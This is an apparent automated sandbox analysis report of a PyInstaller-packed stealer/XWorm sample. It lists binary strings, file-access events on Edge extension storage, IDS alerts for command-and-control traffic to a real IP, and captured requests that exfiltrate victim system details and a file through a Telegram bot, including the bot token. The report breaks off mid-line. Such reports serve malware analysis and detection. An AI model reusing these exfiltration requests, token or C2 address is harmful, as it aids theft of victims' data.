                      Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdb source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000054.00000002.2056884816.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000054.00000000.2033915659.00007FF71F100000.00000002.00000001.01000000.00000024.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201662595.00007FFE148B1000.00000040.00000001.01000000.0000000D.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.pdbhP source: powershell.exe, 00000033.00000002.1942613111.000001F225215000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200043623.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200583861.00007FFE13201000.00000040.00000001.01000000.00000011.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: sB2ClgrGng.exe
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200350794.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199693480.00007FFE0EC5C000.00000040.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sB2ClgrGng.exe, 00000001.00000002.2201280162.00007FFE1463E000.00000040.00000001.01000000.00000009.sdmp
                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sB2ClgrGng.exe, 00000001.00000002.2200882637.00007FFE13381000.00000040.00000001.01000000.0000000C.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sB2ClgrGng.exe, 00000001.00000002.2199391606.00007FFE0EC11000.00000040.00000001.01000000.0000000A.sdmp
                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2199060511.00007FFE0EBD1000.00000040.00000001.01000000.0000000E.sdmp
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644879280 FindFirstFileExW,FindClose,0_2_00007FF644879280
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6448783C0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644879280 FindFirstFileExW,FindClose,1_2_00007FF644879280
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6448783C0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,84_2_00007FF71F0B46EC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F88E0 FindFirstFileExA,84_2_00007FF71F0F88E0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,84_2_00007FF71F0AE21C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 198.23.219.104:7000 -> 192.168.2.4:49739
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 198.23.219.104:7000
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49739 -> 198.23.219.104:7000
                      Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 198.23.219.104:7000 -> 192.168.2.4:49739
                      Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 198.23.219.104:7000
                      Source: Network trafficSuricata IDS: 2853931 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound : 198.23.219.104:7000 -> 192.168.2.4:49739
                      Source: Network trafficSuricata IDS: 2853954 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound : 198.23.219.104:7000 -> 192.168.2.4:49739
                      Source: Malware configuration extractorURLs: 198.23.219.104
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49739 -> 198.23.219.104:7000
                      Source: global trafficHTTP traffic detected: GET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.23.219.104
                      Source: global trafficHTTP traffic detected: GET /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475&text=%E2%98%A0%20%5BFluxJacker%20@mrfluxdev%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0A75AB9E535C7E64F8DEDE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209FGY78%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroup%20:%20RK%20New%20Staup HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: unknownHTTP traffic detected: POST /bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 718866User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=eb9cccf662e2649c85fa5e8d1397dd63
                      Source: sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comod
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D3720F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEDC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192974044.00000281AC99D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2185827911.00000281AC9BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2165183566.00000281AC9AD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184941571.00000281AC99D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2194187546.00000281ACEC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184941571.00000281AC9AD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 